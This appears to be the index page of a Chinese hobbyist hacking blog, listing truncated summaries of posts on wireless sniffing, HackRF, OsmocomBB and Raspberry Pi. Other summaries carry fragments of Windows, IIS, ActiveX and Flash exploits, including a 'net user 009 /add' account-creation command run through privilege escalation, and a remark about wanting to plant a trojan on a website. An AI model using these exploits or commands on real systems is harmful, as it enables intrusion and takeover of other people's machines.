小米手環(huán)分析
摘要:
認(rèn)證很簡(jiǎn)單,只需要在FF04的UUID中寫入20字節(jié)的值并校驗(yàn)通過,就可以對(duì)手環(huán)進(jìn)行讀寫指令控制。
其實(shí)有個(gè)更簡(jiǎn)單的,只要給Immediate Alert這個(gè)屬性發(fā)送0x01或者0x02即可啟動(dòng)“女性?shī)蕵纺J健?,不需要任何認(rèn)證:
(這個(gè)屬性本來是用來可穿戴設(shè)備的找回功能的)
...
閱讀全文
Sniffing Proprietary 2.4GHz Signals
摘要:
(U) Sniffing Proprietary 2.4GHz Signals
使用HackRF或者RTL-SDR加變頻器,那是極好的,但是我最終需要把所有東西都打包到一個(gè)小空間里面。
。。。。。。
閱讀全文
打算做個(gè)HackRF
摘要:
國(guó)外官方是300美元左右,目前買不到,國(guó)內(nèi)有做的,賣2800人民幣,買不起。只能自己做了,好幾個(gè)芯片好貴啊,都上百了。
閱讀全文
使用xgoldmon項(xiàng)目調(diào)試監(jiān)控本機(jī)通信
摘要:
支持手機(jī)(感覺可以把手機(jī)設(shè)置成MODEM模式支持AT命令的應(yīng)該都可以)
- Samsung Galaxy S3 GT-I9300
- Samsung Galaxy Nexus GT-I9250 (has to be rooted!)
- Samsung Galaxy S2 GT-I9100
- Samsung Galaxy Note 2 GT-N7100
。。。。。。
閱讀全文
OsmocomBB項(xiàng)目
摘要:
之前看過好多大牛玩osmocomBB項(xiàng)目,改個(gè)手機(jī),連電腦,然后編譯一堆東西,到最后都是開個(gè)console,滿屏紅紅綠綠的文字滾動(dòng),看著很吊。
但都不說最終能干啥,滾屏完了就沒了,大牛都太低調(diào)了,最近有朋友也在搞這個(gè),了解了一下,以下描述都是我最近查閱的大量鳥文資料及少量中文資料之后的理解,如有誤望指出。
OsmocomBB是國(guó)外一個(gè)開源項(xiàng)目,是GSM協(xié)議棧(Protocols stack)的開源實(shí)現(xiàn),全稱是Open source mobile communication Baseband.目的是要實(shí)現(xiàn)手機(jī)端從物理層(layer1)到layer3的三層實(shí)現(xiàn)。
這里記錄一下過程,以便備忘和其它有需要的童鞋少走彎路。
........
閱讀全文
Raspberry Pi 增加TFT顯示
摘要:
Raspberry Pi是一款基于Linux系統(tǒng)的個(gè)人電腦,配備一枚700MHz的處理器,256內(nèi)存,支持SD卡和Ethernet,擁有兩個(gè)USB接口,以及 HDMI和RCA輸出支持。
有消息稱,雖然Raspberry Pi看起來非常的迷你——只有一張信用卡大小,但是它能夠運(yùn)行像《雷神之錘三:競(jìng)技場(chǎng)》這樣的游戲和進(jìn)行1080p視頻的播放。但是以這次接TFT屏試用結(jié)果看,我覺得至少SPI是純屬扯J8蛋,可能HDMI速度快點(diǎn),但是就以那編譯內(nèi)核的速度來看,并不樂觀。
... ...
閱讀全文
TVB-Gone 紅外編碼方法(每次都重新推算一遍,年紀(jì)大了還是記錄一下吧)
摘要:
每次都重新推算一遍,年紀(jì)大了還是記錄一下吧(
硬件版的TV-B-Gone的壓縮編碼跳過此段往下看)
N900上有個(gè)TVB-Gone的程序,但是程序的紅外編碼往往都是對(duì)應(yīng)的國(guó)外的電視,好多國(guó)產(chǎn)電視都不支持,
有時(shí)候需要遙控空調(diào)或者投影之類的,只能自己錄入了,大概看了一下,編碼比較簡(jiǎn)單(比硬件那個(gè)簡(jiǎn)單多了,畢竟不需要考慮程序空間的問題)
(上次錄過一次,這次又重搞一遍,還是記錄一下,以備后用。)
。。。
閱讀全文
Raspberry Pi 入手安裝配置 (有圖有真相)
摘要:
托rock的福,跟風(fēng)敗了個(gè)Raspberry Pi,(破手機(jī)照的,還可以吧 ^_^),安裝配置如下:
閱讀全文
無(wú)線鍵盤監(jiān)聽(更新 LCD 1602)
摘要:
一個(gè)國(guó)外的開源項(xiàng)目,通過截獲無(wú)線鍵盤發(fā)出的信號(hào),來監(jiān)聽鍵盤按鍵操作,第一個(gè)版本支持監(jiān)聽27MHz的無(wú)線鍵盤,第二個(gè)版本支持2.4G的無(wú)線鍵盤監(jiān)聽及注入功能,爽。
以前玩過C51單片機(jī),加上本身自學(xué)能力和手工焊接功底不錯(cuò),磕磕絆絆幾個(gè)月下來,終于初步完成了這個(gè)小玩意。
這次的芯片是ATMEL的MEGA64A,比之前C51系列的又強(qiáng)大、復(fù)雜了不少,制作過程中遇到非常多的問題,在這里鄙視一下(強(qiáng)烈地)國(guó)內(nèi)的知識(shí)共享精神
…………
閱讀全文
Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版
摘要:
綁定4444端口,Windows 2000 CN + SP4 測(cè)試通過,需要能建目錄的用戶,偏移地址若不通用,請(qǐng)自行修改。
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
..................
閱讀全文
TRS (文本檢索系統(tǒng))注入
摘要:
TRS 是英文Text Retrieval System(文本檢索系統(tǒng))的縮寫,據(jù)說是全文檢索、搜索引擎、內(nèi)容管理及知識(shí)管理核心技術(shù)和產(chǎn)品的統(tǒng)一,入選2008年度國(guó)家規(guī)劃布局內(nèi)重點(diǎn)軟件企業(yè),做某些滲透經(jīng)常會(huì)碰到。
......
閱讀全文
Overwrite $_FILE array in rfc1867 - Mime multipart/form-data File Upload
摘要:
鳥文沒太看明白,摸索了一下,$_FILE數(shù)組元素解析的問題。
搭個(gè)php的環(huán)境,目錄在C:\www下,根目錄下有個(gè)upload.php代碼如下
......
閱讀全文
黑客控制整棟大廈電力系統(tǒng),改編成游戲!
摘要:
這才是牛逼黑客,控制整棟大廈電力系統(tǒng),大廈燈光來做背景,改編成游戲!坦克大戰(zhàn)~~
.............
閱讀全文
以色列人發(fā)現(xiàn)的IE 0day (ZT)
摘要:
測(cè)試成功,點(diǎn)打印后,會(huì)彈出計(jì)算器
.........
閱讀全文
Token Kidnapping Windows 2003 PoC exploit (Win2K3測(cè)試成功)
摘要:
我的有啥補(bǔ)丁打啥補(bǔ)丁的Win2k3 CN SP1測(cè)試成功
d:\Churrasco.exe "net user 009 /add"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 1948
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 472
.......
閱讀全文
WordPress暴絕對(duì)路徑
摘要:
(之前發(fā)的"關(guān)于Fs2You怎么才能不被和諧"的文章被和諧掉了)
裝WordPress順便看到的
默認(rèn)plugins目錄有hello.php文件,不過好像很多插........
閱讀全文
Microsoft Office Snapshot Viewer ActiveX Exploit (可執(zhí)行版)
摘要:
lcx給的,網(wǎng)上的都是放啟動(dòng)項(xiàng),這個(gè)可以自動(dòng)執(zhí)行
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;
var x;
var obj;
.........
閱讀全文
flash 9,0,115,0 exp (ZT)
摘要: 未測(cè)試,覺得比較雞肋,能中的人實(shí)在太少了
閱讀全文
MS08-025 for win2k & win2k3
摘要: Win2k CN SP2 ,Win2k3 CN SP1下測(cè)試通過,其它未測(cè)試(不裝XP那種垃圾)
D:\>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmCo
閱讀全文
Firefox自定義referer插件(Firefox突破防盜鏈)
摘要:
RefControl 0.8.10
要是上次找到這個(gè)插件就好了,省得我一遍一遍地用nc修改referer提交
很多防盜鏈和防本地提交是依靠用戶瀏覽器自動(dòng)提交.......
閱讀全文
Firefox突破圖片防盜鏈
摘要: 以下方法修改完后,再刷新本頁(yè)就能看到上面圖片
Firefox:輸入about:config進(jìn)入配置頁(yè)面,修改network.http.sendRefererHeader的值為1即可(默認(rèn)是2),
.....
閱讀全文
Real Player rmoc3260.dll Exp (老C給的,據(jù)說好用)
摘要:
milw0rm上的,生成器
lcx給的,稍微改了改代碼,據(jù)說好用
未測(cè)試,最近忙到自殺的時(shí)間都沒有
唉,可惜有馬時(shí)候沒洞,有洞時(shí)候沒馬,要不就找個(gè)站掛上了。
http://www.aygfsteel.com/Files/baicker/Real........
閱讀全文
簡(jiǎn)單認(rèn)識(shí)Anti-RootKit(ZT)
摘要: 現(xiàn)在RK(rootkit)和ARK(anti- rootkit)的斗爭(zhēng)已經(jīng)進(jìn)行了很久,在印象中最早出來的ARK工具是冰刃(IceSword),從冰刃開始出來到現(xiàn)在RK和ARK的斗爭(zhēng)一直在繼續(xù),目前冰刃還是在流行當(dāng)中,自己感覺也正是冰刃的出來才帶動(dòng)了當(dāng)前流行的RK和ARK的斗爭(zhēng)呵呵,現(xiàn)在很多病毒木馬已經(jīng)廣泛的帶有驅(qū)動(dòng),使用一些RK的技術(shù)和方法使自己更底層些更強(qiáng)大些,當(dāng)前流行的ARK工具主要包括:隱藏進(jìn)程檢測(cè),內(nèi)核驅(qū)動(dòng)檢測(cè),SSDT檢測(cè),代碼HOOK檢測(cè),注冊(cè)表隱藏的檢測(cè),隱藏文件的檢測(cè)等一些功能的,下面談?wù)勛约簩?duì)一些功能的簡(jiǎn)單愚見 嘻嘻。
..........
閱讀全文